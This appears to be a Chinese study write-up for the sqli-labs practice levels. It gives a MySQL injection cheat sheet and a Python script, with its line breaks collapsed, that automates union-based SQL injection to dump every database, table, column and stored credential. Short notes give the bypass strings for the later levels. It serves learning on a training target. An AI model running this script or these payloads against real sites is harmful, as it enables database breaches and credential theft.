version() Mysql版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库安装路径
@@version_compile_os 操作系统版本
select schema_name from information_schema.schemata
select table_name from information_schema.tables where table_schema='security' -- 该表名用的时候大多转为*16*进制
select column_name from information_schema.columns where table_name='users'
select username,password from security.users
order by (n)
#
--+
--
concat (str1 , str2) -- 连接字符串, 无分隔符
concat (-/~ , str1 , str2) -- 连接字符串, 有分隔符
group_concat (str1 , str2) -- 连接字符串, 并用 ',' 分隔每一个字符
(如题)
首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入
写了个脚本, 一把梭
# coding=utf-8 import requests from urllib import parse import sys from bs4 import BeautifulSoup url = "http://www.sqlstudy.com/sqlstudy/Less-1" def CheckStatus(r_text): if "Login name" in r_text: return 1 else: return 0 def PrintNameAndPswd(res_text): pos_name = res_text.index("Your Login name:") pos_name_move = pos_name pos_pswd = res_text.index("Your Password:", pos_name) pos_pswd_move = pos_pswd str_name = '' str_pswd = '' while res_text[pos_name_move] != '<': pos_name_move += 1 str_name = res_text[pos_name : pos_name_move] while res_text[pos_pswd_move] != '<': pos_pswd_move += 1 str_pswd = res_text[pos_pswd : pos_pswd_move] # print (str_name + '\n' + str_pswd) return str_name def GetColumnsNum(): left = 1 right = 20 mid = (left + right) // 2 while left <= right: payload = "id=1' order by {}--+".format(mid) res = requests.get(url = url , params = payload) # print(parse.unquote(res.url)) res_text = res.text if CheckStatus(res_text): # PrintNameAndPswd(res_text , pos_name , pos_pswd) left = mid + 1 else: right = mid - 1 mid = (right + left) // 2 return mid def HowItContrl(columnsnum): # Your Login name:2 # Your Password:3 payload = "id=-1' union select " for i in range(1 , columnsnum + 1): payload = payload + "{},".format(i) res = requests.get(url=url , params=payload.strip(",") + '--+') res_text = res.text if CheckStatus(res_text): PrintNameAndPswd(res_text) def GetAllDatabase(): payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+" res = requests.get(url=url, params=payload) # print(parse.unquote(res.url)) res_text = res.text if (CheckStatus(res_text)): return PrintNameAndPswd(res_text) def WhereAmI(): payload = "id=-1' union select 1,database(),3 --+" res = requests.get(url=url, params=payload) # print(parse.unquote(res.url)) res_text = res.text if (CheckStatus(res_text)): MyPosition = PrintNameAndPswd(res_text) return MyPosition[MyPosition.index(":") + 1 : ] def GetTableName(DatabaseName): payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName) res = requests.get(url=url, params=payload) # print(parse.unquote(res.url)) res_text = res.text if (CheckStatus(res_text)): TableName = PrintNameAndPswd(res_text) TableName = TableName[TableName.index(":") + 1 :].split(",") return TableName def GetColumnName(TableName): payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName) res = requests.get(url=url, params=payload) # print(parse.unquote(res.url)) res_text = res.text if (CheckStatus(res_text)): ColumnName = PrintNameAndPswd(res_text) ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",") return ColumnName def GetDetails(DatabaseName , TableName , ColumnName): payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName) res = requests.get(url=url, params=payload) # print(parse.unquote(res.url)) res_text = res.text if (CheckStatus(res_text)): Details = PrintNameAndPswd(res_text) Details = Details[Details.index(":") + 1 :].split(",") return Details if __name__ == "__main__" : with open('sqli-lab1.txt' , 'w') as f: columnsnum = GetColumnsNum() f.write("column_number = " + str(columnsnum) + '\n') # HowItContrl(columnsnum) DatabaseName = GetAllDatabase() DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",") MyPosition = WhereAmI() f.write("You are in : " + MyPosition + '\n') for i in range(0,len(DatabaseName)): f.write("DatabaseName : " + DatabaseName[i] + '\n') TableName = [] TableName = GetTableName(DatabaseName[i]) # print(TableName) for j in range(0,len(TableName)): f.write("--TableName : " + TableName[j] + '\n') ColumnName = [] ColumnName = GetColumnName(TableName[j]) # print(ColumnName) for k in range(0, len(ColumnName)): f.write("----ColumnName : " + ColumnName[k] + '\n') Details = [] Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k]) # print(type(Details)) Details_type = str(type(Details)) if not "NoneType" in Details_type: for l in range(0,len(Details)): f.write("------Details : " + Details[l] + '\n') if l == len(Details) - 1: f.write("\n---------------------------------------------------------------\n\n") else: f.write("--------Details : NULL \n")
发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭
使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭
id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈